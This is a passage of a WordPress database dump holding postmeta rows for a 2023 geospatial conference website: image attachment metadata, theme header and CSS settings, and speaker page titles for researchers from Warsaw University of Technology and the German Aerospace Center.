(20257,3252,'_wp_attachment_metadata','a:9:{s:8:\"filesize\";i:14809352;s:9:\"mime_type\";s:15:\"video/quicktime\";s:6:\"length\";i:125;s:16:\"length_formatted\";s:4:\"2:05\";s:5:\"width\";i:960;s:6:\"height\";i:540;s:10:\"fileformat\";s:3:\"mp4\";s:5:\"audio\";a:7:{s:10:\"dataformat\";s:3:\"mp4\";s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:48000;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";}s:17:\"created_timestamp\";i:1654736940;}'),
(20258,3253,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}'),
(20259,3254,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}'),
(20260,3255,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}'),
(20261,3252,'dt-img-hide-title','0'),
(20262,3256,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}'),
(20263,3257,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}'),
(20264,3258,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}'),
(20265,3259,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}'),
(20267,3262,'_edit_lock','1668033544:1'),
(20268,3263,'_wp_attached_file','2022/11/w211.jpg'),
(20269,3263,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:135;s:6:\"height\";i:170;s:4:\"file\";s:16:\"2022/11/w211.jpg\";s:8:\"filesize\";i:29862;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w211-135x150.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4571;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20270,3262,'_thumbnail_id','3263'),
(20271,3262,'_edit_last','1'),
(20272,3262,'_dt_sidebar_position','disabled'),
(20273,3262,'_dt_sidebar_widgetarea_id','sidebar_1'),
(20274,3262,'_dt_sidebar_hide_on_mobile','0'),
(20275,3262,'_dt_footer_show','1'),
(20276,3262,'_dt_footer_widgetarea_id','sidebar_2'),
(20277,3262,'_dt_footer_hide_on_mobile','0'),
(20278,3262,'_dt_header_title','fancy'),
(20279,3262,'_dt_header_background','normal'),
(20280,3262,'_dt_header_background_below_slideshow','disabled'),
(20281,3262,'_dt_header_transparent_bg_color_scheme','light'),
(20282,3262,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(20283,3262,'_dt_header_transparent_top_bar_bg_opacity','25'),
(20284,3262,'_dt_header_transparent_bg_color','#000000'),
(20285,3262,'_dt_header_transparent_bg_opacity','50'),
(20286,3262,'_dt_header_disabled_background','normal'),
(20287,3262,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(20288,3262,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(20289,3262,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(20290,3262,'_dt_header_disabled_transparent_bg_color','#000000'),
(20291,3262,'_dt_header_disabled_transparent_bg_opacity','50'),
(20292,3262,'_dt_page_overrides_top_margin',''),
(20293,3262,'_dt_page_overrides_right_margin',''),
(20294,3262,'_dt_page_overrides_bottom_margin',''),
(20295,3262,'_dt_page_overrides_left_margin',''),
(20296,3262,'_dt_mobile_page_padding_top',''),
(20297,3262,'_dt_mobile_page_padding_right',''),
(20298,3262,'_dt_mobile_page_padding_bottom',''),
(20299,3262,'_dt_mobile_page_padding_left',''),
(20300,3262,'_dt_fancy_header_layout_heading',''),
(20301,3262,'_dt_fancy_header_title_aligment','center'),
(20302,3262,'_dt_fancy_header_height','300'),
(20303,3262,'_dt_fancy_header_padding-top','0px'),
(20304,3262,'_dt_fancy_header_padding-bottom','0px'),
(20305,3262,'_dt_fancy_header_breadcrumbs_heading',''),
(20306,3262,'_dt_fancy_header_breadcrumbs','disabled'),
(20307,3262,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(20308,3262,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(20309,3262,'_dt_fancy_header_title_heading',''),
(20310,3262,'_dt_fancy_header_title_mode','custom'),
(20311,3262,'_dt_fancy_header_title','Krzysztof Bakuła Warsaw University of Technology, Poland (WG I/6)'),
(20312,3262,'_dt_fancy_header_title_font_size','30'),
(20313,3262,'_dt_fancy_header_title_line_height','36'),
(20314,3262,'_dt_fancy_header_text_transform','none'),
(20315,3262,'_dt_fancy_header_title_color_mode','color'),
(20316,3262,'_dt_fancy_header_title_color','#ffffff'),
(20317,3262,'_dt_fancy_header_subtitle_heading',''),
(20318,3262,'_dt_fancy_header_subtitle',''),
(20319,3262,'_dt_fancy_header_subtitle_font_size','18'),
(20320,3262,'_dt_fancy_header_subtitle_line_height','26'),
(20321,3262,'_dt_fancy_header_subtitle_text_transform','none'),
(20322,3262,'_dt_fancy_header_subtitle_color_mode','color'),
(20323,3262,'_dt_fancy_header_subtitle_color','#ffffff'),
(20324,3262,'_dt_fancy_header_bg_heading',''),
(20325,3262,'_dt_fancy_header_bg_color','#222222'),
(20326,3262,'_dt_fancy_header_bg_image_origin','custom'),
(20327,3262,'_dt_fancy_header_bg_image','a:0:{}'),
(20328,3262,'_dt_fancy_header_bg_repeat','no-repeat'),
(20329,3262,'_dt_fancy_header_bg_position_x','center'),
(20330,3262,'_dt_fancy_header_bg_position_y','center'),
(20331,3262,'_dt_fancy_header_bg_fullscreen','1'),
(20332,3262,'_dt_fancy_header_bg_overlay','0'),
(20333,3262,'_dt_fancy_header_overlay_color','#000'),
(20334,3262,'_dt_fancy_header_bg_overlay_opacity','50'),
(20335,3262,'_dt_fancy_header_scroll_effect','default'),
(20336,3262,'_dt_fancy_header_bg_parallax','0.5'),
(20337,3262,'_dt_fancy_header_responsiveness_heading',''),
(20338,3262,'_dt_fancy_header_responsiveness','enabled'),
(20339,3262,'_dt_fancy_header_responsiveness_switch','778px'),
(20340,3262,'_dt_fancy_header_responsive_height','70'),
(20341,3262,'_dt_fancy_header_responsive_font_size','30'),
(20342,3262,'_dt_fancy_header_responsive_title_line_height','38'),
(20343,3262,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(20344,3262,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(20345,3262,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(20346,3262,'_dt_teammate_options_go_to_single','1'),
(20347,3262,'_dt_teammate_options_position',''),
(20348,3262,'_dt_teammate_options_website',''),
(20349,3262,'_dt_teammate_options_mail',''),
(20350,3262,'_dt_teammate_options_facebook',''),
(20351,3262,'_dt_teammate_options_twitter',''),
(20352,3262,'_dt_teammate_options_dribbble',''),
(20353,3262,'_dt_teammate_options_you-tube',''),
(20354,3262,'_dt_teammate_options_rss',''),
(20355,3262,'_dt_teammate_options_delicious',''),
(20356,3262,'_dt_teammate_options_flickr',''),
(20357,3262,'_dt_teammate_options_lastfm',''),
(20358,3262,'_dt_teammate_options_linkedin',''),
(20359,3262,'_dt_teammate_options_vimeo',''),
(20360,3262,'_dt_teammate_options_tumbler',''),
(20361,3262,'_dt_teammate_options_pinterest',''),
(20362,3262,'_dt_teammate_options_devian',''),
(20363,3262,'_dt_teammate_options_skype',''),
(20364,3262,'_dt_teammate_options_github',''),
(20365,3262,'_dt_teammate_options_instagram',''),
(20366,3262,'_dt_teammate_options_stumbleupon',''),
(20367,3262,'_dt_teammate_options_behance',''),
(20368,3262,'_dt_teammate_options_px-500',''),
(20369,3262,'_dt_teammate_options_tripedvisor',''),
(20370,3262,'_dt_teammate_options_vk',''),
(20371,3262,'_dt_teammate_options_foursquare',''),
(20372,3262,'_dt_teammate_options_xing',''),
(20373,3262,'_dt_teammate_options_weibo',''),
(20374,3262,'_dt_teammate_options_odnoklassniki',''),
(20375,3262,'_dt_teammate_options_research-gate',''),
(20376,3262,'_dt_teammate_options_yelp',''),
(20377,3262,'_dt_teammate_options_blogger',''),
(20378,3262,'_dt_teammate_options_soundcloud',''),
(20379,3262,'_dt_teammate_options_viber',''),
(20380,3262,'_dt_teammate_options_whatsapp',''),
(20381,3262,'_dt_teammate_options_reddit',''),
(20382,3262,'_dt_teammate_options_snapchat',''),
(20383,3262,'_dt_teammate_options_telegram',''),
(20384,3262,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(20385,3264,'_edit_lock','1668034352:1'),
(20386,3265,'_wp_attached_file','2022/11/w212.jpg'),
(20387,3265,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:135;s:6:\"height\";i:174;s:4:\"file\";s:16:\"2022/11/w212.jpg\";s:8:\"filesize\";i:37132;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w212-135x150.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5387;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20388,3264,'_thumbnail_id','3265'),
(20389,3264,'_edit_last','1'),
(20390,3264,'_dt_sidebar_position','right'),
(20391,3264,'_dt_sidebar_widgetarea_id','sidebar_1'),
(20392,3264,'_dt_sidebar_hide_on_mobile','0'),
(20393,3264,'_dt_footer_show','1'),
(20394,3264,'_dt_footer_widgetarea_id','sidebar_2'),
(20395,3264,'_dt_footer_hide_on_mobile','0'),
(20396,3264,'_dt_header_title','fancy'),
(20397,3264,'_dt_header_background','normal'),
(20398,3264,'_dt_header_background_below_slideshow','disabled'),
(20399,3264,'_dt_header_transparent_bg_color_scheme','light'),
(20400,3264,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(20401,3264,'_dt_header_transparent_top_bar_bg_opacity','25'),
(20402,3264,'_dt_header_transparent_bg_color','#000000'),
(20403,3264,'_dt_header_transparent_bg_opacity','50'),
(20404,3264,'_dt_header_disabled_background','normal'),
(20405,3264,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(20406,3264,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(20407,3264,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(20408,3264,'_dt_header_disabled_transparent_bg_color','#000000'),
(20409,3264,'_dt_header_disabled_transparent_bg_opacity','50'),
(20410,3264,'_dt_page_overrides_top_margin',''),
(20411,3264,'_dt_page_overrides_right_margin',''),
(20412,3264,'_dt_page_overrides_bottom_margin',''),
(20413,3264,'_dt_page_overrides_left_margin',''),
(20414,3264,'_dt_mobile_page_padding_top',''),
(20415,3264,'_dt_mobile_page_padding_right',''),
(20416,3264,'_dt_mobile_page_padding_bottom',''),
(20417,3264,'_dt_mobile_page_padding_left',''),
(20418,3264,'_dt_fancy_header_layout_heading',''),
(20419,3264,'_dt_fancy_header_title_aligment','center'),
(20420,3264,'_dt_fancy_header_height','300'),
(20421,3264,'_dt_fancy_header_padding-top','0px'),
(20422,3264,'_dt_fancy_header_padding-bottom','0px'),
(20423,3264,'_dt_fancy_header_breadcrumbs_heading',''),
(20424,3264,'_dt_fancy_header_breadcrumbs','disabled'),
(20425,3264,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(20426,3264,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(20427,3264,'_dt_fancy_header_title_heading',''),
(20428,3264,'_dt_fancy_header_title_mode','custom'),
(20429,3264,'_dt_fancy_header_title','Henry Meißner  German Aerospace Center, Germany (WG I/6)'),
(20430,3264,'_dt_fancy_header_title_font_size','30'),
(20431,3264,'_dt_fancy_header_title_line_height','36'),
(20432,3264,'_dt_fancy_header_text_transform','none'),
(20433,3264,'_dt_fancy_header_title_color_mode','color'),
(20434,3264,'_dt_fancy_header_title_color','#ffffff'),
(20435,3264,'_dt_fancy_header_subtitle_heading',''),
(20436,3264,'_dt_fancy_header_subtitle',''),
(20437,3264,'_dt_fancy_header_subtitle_font_size','18'),
(20438,3264,'_dt_fancy_header_subtitle_line_height','26'),
(20439,3264,'_dt_fancy_header_subtitle_text_transform','none'),
(20440,3264,'_dt_fancy_header_subtitle_color_mode','color'),
(20441,3264,'_dt_fancy_header_subtitle_color','#ffffff'),
(20442,3264,'_dt_fancy_header_bg_heading',''),
(20443,3264,'_dt_fancy_header_bg_color','#222222'),
(20444,3264,'_dt_fancy_header_bg_image_origin','custom'),
(20445,3264,'_dt_fancy_header_bg_image','a:0:{}'),
(20446,3264,'_dt_fancy_header_bg_repeat','no-repeat'),
(20447,3264,'_dt_fancy_header_bg_position_x','center'),
(20448,3264,'_dt_fancy_header_bg_position_y','center'),
(20449,3264,'_dt_fancy_header_bg_fullscreen','1'),
(20450,3264,'_dt_fancy_header_bg_overlay','0'),
(20451,3264,'_dt_fancy_header_overlay_color','#000'),
(20452,3264,'_dt_fancy_header_bg_overlay_opacity','50'),
(20453,3264,'_dt_fancy_header_scroll_effect','default'),
(20454,3264,'_dt_fancy_header_bg_parallax','0.5'),
(20455,3264,'_dt_fancy_header_responsiveness_heading',''),
(20456,3264,'_dt_fancy_header_responsiveness','enabled'),
(20457,3264,'_dt_fancy_header_responsiveness_switch','778px'),
(20458,3264,'_dt_fancy_header_responsive_height','70'),
(20459,3264,'_dt_fancy_header_responsive_font_size','30'),
(20460,3264,'_dt_fancy_header_responsive_title_line_height','38'),
(20461,3264,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(20462,3264,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(20463,3264,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(20464,3264,'_dt_teammate_options_go_to_single','1'),
(20465,3264,'_dt_teammate_options_position',''),
(20466,3264,'_dt_teammate_options_website',''),
(20467,3264,'_dt_teammate_options_mail',''),
(20468,3264,'_dt_teammate_options_facebook',''),
(20469,3264,'_dt_teammate_options_twitter',''),
(20470,3264,'_dt_teammate_options_dribbble',''),
(20471,3264,'_dt_teammate_options_you-tube',''),
(20472,3264,'_dt_teammate_options_rss',''),
(20473,3264,'_dt_teammate_options_delicious',''),
(20474,3264,'_dt_teammate_options_flickr',''),
(20475,3264,'_dt_teammate_options_lastfm',''),
(20476,3264,'_dt_teammate_options_linkedin',''),
(20477,3264,'_dt_teammate_options_vimeo',''),
(20478,3264,'_dt_teammate_options_tumbler',''),
(20479,3264,'_dt_teammate_options_pinterest',''),
(20480,3264,'_dt_teammate_options_devian',''),
(20481,3264,'_dt_teammate_options_skype',''),
(20482,3264,'_dt_teammate_options_github',''),
(20483,3264,'_dt_teammate_options_instagram',''),
(20484,3264,'_dt_teammate_options_stumbleupon',''),
(20485,3264,'_dt_teammate_options_behance',''),
(20486,3264,'_dt_teammate_options_px-500',''),
(20487,3264,'_dt_teammate_options_tripedvisor',''),
(20488,3264,'_dt_teammate_options_vk',''),
(20489,3264,'_dt_teammate_options_foursquare',''),
(20490,3264,'_dt_teammate_options_xing',''),
(20491,3264,'_dt_teammate_options_weibo',''),
(20492,3264,'_dt_teammate_options_odnoklassniki',''),
(20493,3264,'_dt_teammate_options_research-gate',''),
(20494,3264,'_dt_teammate_options_yelp',''),
(20495,3264,'_dt_teammate_options_blogger',''),
(20496,3264,'_dt_teammate_options_soundcloud',''),
(20497,3264,'_dt_teammate_options_viber',''),
(20498,3264,'_dt_teammate_options_whatsapp',''),
(20499,3264,'_dt_teammate_options_reddit',''),
(20500,3264,'_dt_teammate_options_snapchat',''),
(20501,3264,'_dt_teammate_options_telegram',''),
(20502,3264,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(20503,3266,'_edit_lock','1675608063:1'),
(20504,3267,'_wp_attached_file','2022/11/w21m.jpg'),
(20505,3267,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:617;s:6:\"height\";i:470;s:4:\"file\";s:16:\"2022/11/w21m.jpg\";s:8:\"filesize\";i:248080;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"w21m-300x229.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:229;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20379;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w21m-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8716;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"w21m-500x381.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41704;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20506,3266,'_thumbnail_id','3267'),
(20507,3266,'_edit_last','1'),
(20508,3266,'_wpb_vc_js_status','true'),
(20509,3266,'_dt_sidebar_position','disabled'),
(20510,3266,'_dt_sidebar_widgetarea_id','sidebar_1'),
(20511,3266,'_dt_sidebar_hide_on_mobile','0'),
(20512,3266,'_dt_footer_show','1'),
(20513,3266,'_dt_footer_widgetarea_id','sidebar_2'),
(20514,3266,'_dt_footer_hide_on_mobile','0'),
(20515,3266,'_dt_header_title','fancy'),
(20516,3266,'_dt_header_background','normal'),
(20517,3266,'_dt_header_background_below_slideshow','disabled'),
(20518,3266,'_dt_header_transparent_bg_color_scheme','light'),
(20519,3266,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(20520,3266,'_dt_header_transparent_top_bar_bg_opacity','25'),
(20521,3266,'_dt_header_transparent_bg_color','#000000'),
(20522,3266,'_dt_header_transparent_bg_opacity','50'),
(20523,3266,'_dt_header_disabled_background','normal'),
(20524,3266,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(20525,3266,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(20526,3266,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(20527,3266,'_dt_header_disabled_transparent_bg_color','#000000'),
(20528,3266,'_dt_header_disabled_transparent_bg_opacity','50'),
(20529,3266,'_dt_page_overrides_top_margin',''),
(20530,3266,'_dt_page_overrides_right_margin',''),
(20531,3266,'_dt_page_overrides_bottom_margin',''),
(20532,3266,'_dt_page_overrides_left_margin',''),
(20533,3266,'_dt_mobile_page_padding_top',''),
(20534,3266,'_dt_mobile_page_padding_right',''),
(20535,3266,'_dt_mobile_page_padding_bottom',''),
(20536,3266,'_dt_mobile_page_padding_left',''),
(20537,3266,'_dt_fancy_header_layout_heading',''),
(20538,3266,'_dt_fancy_header_title_aligment','center'),
(20539,3266,'_dt_fancy_header_height','300'),
(20540,3266,'_dt_fancy_header_padding-top','0px'),
(20541,3266,'_dt_fancy_header_padding-bottom','0px'),
(20542,3266,'_dt_fancy_header_breadcrumbs_heading',''),
(20543,3266,'_dt_fancy_header_breadcrumbs','disabled'),
(20544,3266,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(20545,3266,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(20546,3266,'_dt_fancy_header_title_heading',''),
(20547,3266,'_dt_fancy_header_title_mode','custom'),
(20548,3266,'_dt_fancy_header_title',''),
(20549,3266,'_dt_fancy_header_title_font_size','30'),
(20550,3266,'_dt_fancy_header_title_line_height','36'),
(20551,3266,'_dt_fancy_header_text_transform','none'),
(20552,3266,'_dt_fancy_header_title_color_mode','color'),
(20553,3266,'_dt_fancy_header_title_color','#311b94'),
(20554,3266,'_dt_fancy_header_subtitle_heading',''),
(20555,3266,'_dt_fancy_header_subtitle',''),
(20556,3266,'_dt_fancy_header_subtitle_font_size','18'),
(20557,3266,'_dt_fancy_header_subtitle_line_height','26'),
(20558,3266,'_dt_fancy_header_subtitle_text_transform','none'),
(20559,3266,'_dt_fancy_header_subtitle_color_mode','color'),
(20560,3266,'_dt_fancy_header_subtitle_color','#ffffff'),
(20561,3266,'_dt_fancy_header_bg_heading',''),
(20562,3266,'_dt_fancy_header_bg_color','#222222'),
(20563,3266,'_dt_fancy_header_bg_image_origin','featured_image'),
(20564,3266,'_dt_fancy_header_bg_image','a:0:{}'),
(20565,3266,'_dt_fancy_header_bg_repeat','no-repeat'),
(20566,3266,'_dt_fancy_header_bg_position_x','center'),
(20567,3266,'_dt_fancy_header_bg_position_y','center'),
(20568,3266,'_dt_fancy_header_bg_fullscreen','1'),
(20569,3266,'_dt_fancy_header_bg_overlay','0'),
(20570,3266,'_dt_fancy_header_overlay_color','#000'),
(20571,3266,'_dt_fancy_header_bg_overlay_opacity','50'),
(20572,3266,'_dt_fancy_header_scroll_effect','default'),
(20573,3266,'_dt_fancy_header_bg_parallax','0.5'),
(20574,3266,'_dt_fancy_header_responsiveness_heading',''),
(20575,3266,'_dt_fancy_header_responsiveness','enabled'),
(20576,3266,'_dt_fancy_header_responsiveness_switch','778px'),
(20577,3266,'_dt_fancy_header_responsive_height','70'),
(20578,3266,'_dt_fancy_header_responsive_font_size','30'),
(20579,3266,'_dt_fancy_header_responsive_title_line_height','38'),
(20580,3266,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(20581,3266,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(20582,3266,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(20583,3266,'_dt_project_options_back_button',''),
(20584,3266,'_dt_project_options_show_link',''),
(20585,3266,'_dt_project_options_link',''),
(20586,3266,'_dt_project_options_link_target',''),
(20587,3266,'_dt_project_options_link_name',''),
(20588,3266,'_dt_project_options_hide_thumbnail','1'),
(20589,3266,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(20590,3266,'_dt_project_options_related_mode','same'),
(20591,3266,'_dt_project_options_preview','normal'),
(20592,3266,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/w21m.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #311b94;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(20593,3266,'_wp_page_template','default'),
(20594,3266,'_dt_microsite_primary_menu',''),
(20595,3266,'_dt_microsite_split_left_menu',''),
(20596,3266,'_dt_microsite_split_right_menu',''),
(20597,3266,'_dt_microsite_mobile_menu',''),
(20598,3269,'_wp_attached_file','2022/11/w21m-1.jpg'),
